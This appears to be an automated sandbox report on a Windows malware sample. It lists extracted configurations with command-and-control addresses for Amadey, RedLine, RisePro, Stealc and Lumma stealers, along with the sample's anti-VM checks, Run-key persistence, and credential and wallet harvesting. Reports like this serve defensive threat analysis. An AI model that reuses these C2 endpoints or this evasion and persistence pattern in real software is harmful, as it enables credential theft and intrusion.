Analysis
-
max time kernel
103s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
15/03/2024, 04:11
Static task
static1
Behavioral task
behavioral1
Sample
cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe
Resource
win10v2004-20240226-en
General
-
Target
cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe
-
Size
1.8MB
-
MD5
aaacf46a89720b66de3ad6b5a2947fa8
-
SHA1
5718da5742ed0025a1164e6b1bc8c100504408d0
-
SHA256
cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a
-
SHA512
cb9716cfdf6576f47873a05c7763f0a15c356fe885d76bc516dab7e501fd2fa63e34c4da14a7bb96d86c311849daef9c3167f7be4cfa4c8bf3d14941e6ee225d
-
SSDEEP
49152:rT7zkGiVDmwpsx7lmnpqNbz1x7WifIVaN0E:n7aZw7lHF7nAVd
Malware Config
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
redline
LiveTraffic
20.218.68.91:7690
Extracted
risepro
193.233.132.62
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
stealc
http://185.172.128.145
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
lumma
https://resergvearyinitiani.shop/api
https://colorfulequalugliess.shop/api
https://associationokeo.shop/api
Signatures
-
Detect ZGRat V1 6 IoCs
resource yara_rule behavioral2/files/0x0007000000023243-172.dat family_zgrat_v1 behavioral2/files/0x0007000000023243-192.dat family_zgrat_v1 behavioral2/memory/1544-196-0x0000000000C80000-0x0000000000E3A000-memory.dmp family_zgrat_v1 behavioral2/memory/2228-294-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 behavioral2/files/0x0007000000023275-308.dat family_zgrat_v1 behavioral2/files/0x000900000002323d-418.dat family_zgrat_v1 -
Glupteba payload 3 IoCs
resource yara_rule behavioral2/memory/2396-840-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2396-935-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/5352-941-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral2/memory/2052-79-0x0000000000400000-0x0000000000450000-memory.dmp family_redline behavioral2/files/0x000700000002326d-262.dat family_redline behavioral2/memory/3656-298-0x0000000000840000-0x00000000008CC000-memory.dmp family_redline behavioral2/files/0x0007000000023275-308.dat family_redline behavioral2/files/0x0007000000023274-316.dat family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amadka.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lenin.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 64 3204 rundll32.exe 66 5056 rundll32.exe 119 1436 rundll32.exe 124 5340 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4296 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lenin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lenin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation syncUpd.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation GDBAKKKFBG.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation explorgu.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation amadka.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation explorha.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation InstallSetup8.exe -
Executes dropped EXE 25 IoCs
pid Process 2140 explorgu.exe 2980 osminog.exe 3184 goldprime1234.exe 3884 judith1234.exe 1544 alex12341.exe 4184 stub.exe 3656 TeamFour.exe 5080 olehpsp.exe 4488 TWO.exe 4492 random.exe 5040 amadka.exe 5336 lummahelp.exe 1888 InstallSetup3.exe 5980 explorha.exe 1876 syncUpd.exe 5428 BroomSetup.exe 2760 lenin.exe 2016 InstallSetup8.exe 116 InstallSetup8.exe 2396 4767d2e713f2021e8fe856e3ea638b58.exe 5516 FirstZ.exe 5216 GDBAKKKFBG.exe 5800 explorha.exe 5352 4767d2e713f2021e8fe856e3ea638b58.exe 6096 InstallSetup8.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine amadka.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine lenin.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine explorha.exe -
Loads dropped DLL 42 IoCs
pid Process 956 rundll32.exe 3204 rundll32.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 4184 stub.exe 5056 rundll32.exe 1888 InstallSetup3.exe 1888 InstallSetup3.exe 3892 rundll32.exe 1436 rundll32.exe 1876 syncUpd.exe 1876 syncUpd.exe 5340 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/5428-756-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDBAKKKFBG.exe" GDBAKKKFBG.exe Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000873001\\random.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\random.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000874021\\random.cmd" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000875001\\amadka.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lenin.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000010001\\lenin.exe" explorha.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 131 pastebin.com 132 pastebin.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1904 cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe 2140 explorgu.exe 5040 amadka.exe 5980 explorha.exe 5800 explorha.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2980 set thread context of 3896 2980 osminog.exe 107 PID 3184 set thread context of 2052 3184 goldprime1234.exe 108 PID 1544 set thread context of 2228 1544 alex12341.exe 141 PID 5336 set thread context of 3344 5336 lummahelp.exe 178 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorha.job amadka.exe File created C:\Windows\Tasks\explorgu.job cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5296 sc.exe 5496 sc.exe 1012 sc.exe 3184 sc.exe 4732 sc.exe 5892 sc.exe 3548 sc.exe 2044 sc.exe 5496 sc.exe 4876 sc.exe 5592 sc.exe 5588 sc.exe 2084 sc.exe 3332 sc.exe 884 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2084 3896 WerFault.exe 107 2936 3344 WerFault.exe 178 -
NSIS installer 1 IoCs
resource yara_rule behavioral2/files/0x000800000002324a-468.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2988 schtasks.exe 5520 schtasks.exe 4652 schtasks.exe 5780 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4504 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1228 tasklist.exe 576 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4040 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1904 cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe 1904 cddb36a5d37c4a7343f0284b830345ee18ef510c21f8a673d20cc770077ec61a.exe 2140 explorgu.exe 2140 explorgu.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 3204 rundll32.exe 4352 powershell.exe 4352 powershell.exe 4352 powershell.exe 5040 amadka.exe 5040 amadka.exe 5080 olehpsp.exe 5080 olehpsp.exe 5392 msedge.exe 5392 msedge.exe 4092 msedge.exe 4092 msedge.exe 5876 msedge.exe 5876 msedge.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5080 olehpsp.exe 5980 explorha.exe 5980 explorha.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 3656 TeamFour.exe 4488 TWO.exe 4488 TWO.exe 1876 syncUpd.exe 1876 syncUpd.exe 4488 TWO.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4092 msedge.exe 4092 msedge.exe 4092 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
